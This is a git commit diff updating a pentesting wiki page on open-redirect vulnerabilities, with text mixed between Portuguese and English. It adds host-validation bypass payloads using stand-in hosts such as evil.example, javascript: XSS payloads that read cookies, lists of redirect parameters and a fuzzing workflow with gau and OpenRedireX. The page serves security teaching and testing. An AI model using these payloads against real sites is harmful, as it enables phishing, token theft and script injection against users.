Translated ['src/pentesting-web/open-redirect.md'] to pt

2025-10-10 18:36:50 +00:00 · 2025-10-01 15:27:17 +00:00 · 2025-10-01 15:27:17 +00:00 · 6c0b0f7629
commit 6c0b0f7629
parent ace11cb9b3
1 changed files with 117 additions and 10 deletions
--- a/src/pentesting-web/open-redirect.md
+++ b/src/pentesting-web/open-redirect.md
@ -1,18 +1,29 @@
-# Redirecionamento Aberto
+# Open Redirect

 {{#include ../banners/hacktricks-training.md}}


-## Redirecionamento Aberto
+## Open redirect

-### Redirecionar para localhost ou domínios arbitrários
+### Redirect to localhost or arbitrary domains

+- Se a aplicação “allows only internal/whitelisted hosts”, tente notações alternativas de host para alcançar loopback ou ranges internos através do destino do redirect:
+- Variantes IPv4 do loopback: 127.0.0.1, 127.1, 2130706433 (decimal), 0x7f000001 (hex), 017700000001 (octal)
+- Variantes IPv6 do loopback: [::1], [0:0:0:0:0:0:0:1], [::ffff:127.0.0.1]
+- Ponto final e diferenciação de maiúsculas/minúsculas: localhost., LOCALHOST, 127.0.0.1.
+- Wildcard DNS que resolve para loopback: lvh.me, sslip.io (e.g., 127.0.0.1.sslip.io), traefik.me, localtest.me. Úteis quando apenas “subdomains of X” são permitidos mas a resolução do host ainda aponta para 127.0.0.1.
+- Network-path references frequentemente contornam validadores ingênuos que prefixam um scheme ou apenas checam prefixes:
+- //attacker.tld → interpreted as scheme-relative and navigates off-site with the current scheme.
+- Userinfo tricks derrotam checagens contains/startswith contra hosts confiáveis:
+- https://trusted.tld@attacker.tld/ → o navegador navega para attacker.tld, mas checagens simples de string “veem” trusted.tld.
+- Confusão no parsing de backslash entre frameworks/browsers:
+- https://trusted.tld\@attacker.tld → alguns backends tratam “\” como caractere de path e passam na validação; browsers normalizam para “/” e interpretam trusted.tld como userinfo, enviando usuários para attacker.tld. Isso também aparece em Node/PHP URL-parser mismatches.

 {{#ref}}
 ssrf-server-side-request-forgery/url-format-bypass.md
 {{#endref}}

-### Redirecionamento Aberto para XSS
+### Modern open-redirect to XSS pivots
 ```bash
 #Basic payload, javascript code is executed after "javascript:"
 javascript:alert(1)
@ -58,7 +69,36 @@ javascript://whitelisted.com?%a0alert%281%29
 /x:1/:///%01javascript:alert(document.cookie)/
 ";alert(0);//
 ```
-## Open Redirect enviando arquivos svg
+<details>
+<summary>Mais modernos payloads de bypass baseados em URL</summary>
+```text
+# Scheme-relative (current scheme is reused)
+//evil.example
+
+# Credentials (userinfo) trick
+https://trusted.example@evil.example/
+
+# Backslash confusion (server validates, browser normalizes)
+https://trusted.example\@evil.example/
+
+# Schemeless with whitespace/control chars
+evil.example%00
+%09//evil.example
+
+# Prefix/suffix matching flaws
+https://trusted.example.evil.example/
+https://evil.example/trusted.example
+
+# When only path is accepted, try breaking absolute URL detection
+/\\evil.example
+/..//evil.example
+```
+
+```
+</details>
+
+## Open Redirect uploading svg files
+
 ```html
 <code>
 <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
@ -68,7 +108,9 @@ xmlns="http://www.w3.org/2000/svg">
 </svg>
 </code>
 ```
-## Parâmetros de injeção comuns
+
+## Common injection parameters
+
 ```
 /{payload}
 ?next={payload}
@ -143,17 +185,23 @@ RedirectUrl=https://c1h2e1.github.io
 Redirect=https://c1h2e1.github.io
 ReturnUrl=https://c1h2e1.github.io
 ```
-## Exemplos de código
+
+## Code examples

 #### .Net
+
 ```bash
 response.redirect("~/mysafe-subdomain/login.aspx")
 ```
+
 #### Java
+
 ```bash
 response.redirect("http://mysafedomain.com");
 ```
+
 #### PHP
+
 ```php
 <?php
 /* browser redirections*/
@ -161,16 +209,75 @@ header("Location: http://mysafedomain.com");
 exit;
 ?>
 ```
+
+## Hunting and exploitation workflow (practical)
+
+- Single URL check with curl:
+
+```bash
+curl -s -I "https://target.tld/redirect?url=//evil.example" | grep -i "^Location:"
+```
+
+- Discover and fuzz likely parameters at scale:
+
+<details>
+<summary>Click to expand</summary>
+
+```bash
+# 1) Colete URLs históricas, mantenha aquelas com parâmetros de redirecionamento comuns
+cat domains.txt \
+| gau --o urls.txt            # or: waybackurls / katana / hakrawler
+
+# 2) Procure parâmetros comuns e normalize a lista
+rg -NI "(url=|next=|redir=|redirect|dest=|rurl=|return=|continue=)" urls.txt \
+| sed 's/\r$//' | sort -u > candidates.txt
+
+# 3) Use OpenRedireX para fuzz com um corpus de payloads
+cat candidates.txt | openredirex -p payloads.txt -k FUZZ -c 50 > results.txt
+
+# 4) Verifique manualmente os resultados interessantes
+awk '/30[1237]|Location:/I' results.txt
+```
+```
+</details>
+
+- Não se esqueça dos sinks do lado do cliente em SPAs: procure por window.location/assign/replace e framework helpers que leem query/hash e redirecionam.
+
+- Frameworks frequentemente introduzem footguns quando destinos de redirect são derivados de input não confiável (query params, Referer, cookies). See Next.js notes about redirects and avoid dynamic destinations derived from user input.
+
+{{#ref}}
+../network-services-pentesting/pentesting-web/nextjs.md
+{{#endref}}
+
+- OAuth/OIDC flows: abusing open redirectors frequently escalates to account takeover by leaking authorization codes/tokens. See dedicated guide:
+
+{{#ref}}
+./oauth-to-account-takeover.md
+{{#endref}}
+
+- Server responses that implement redirects without Location (meta refresh/JavaScript) are still exploitable for phishing and can sometimes be chained. Grep for:
+```html
+<meta http-equiv="refresh" content="0;url=//evil.example">
+<script>location = new URLSearchParams(location.search).get('next')</script>
+```
 ## Ferramentas

 - [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer)
+- OpenRedireX – fuzzer para detectar open redirects. Exemplo:
+```bash
+# Install
+git clone https://github.com/devanshbatham/OpenRedireX && cd OpenRedireX && ./setup.sh

-## Recursos
+# Fuzz a list of candidate URLs (use FUZZ as placeholder)
+cat list_of_urls.txt | ./openredirex.py -p payloads.txt -k FUZZ -c 50
+```
+## Referências

- Em [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) você pode encontrar listas de fuzzing.
+- Em https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect você pode encontrar fuzzing lists.
 - [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)
 - [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
 - [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a)
-
+- PortSwigger Web Security Academy – DOM-based open redirection: https://portswigger.net/web-security/dom-based/open-redirection
+- OpenRedireX – Um fuzzer para detectar open redirect vulnerabilities: https://github.com/devanshbatham/OpenRedireX

 {{#include ../banners/hacktricks-training.md}}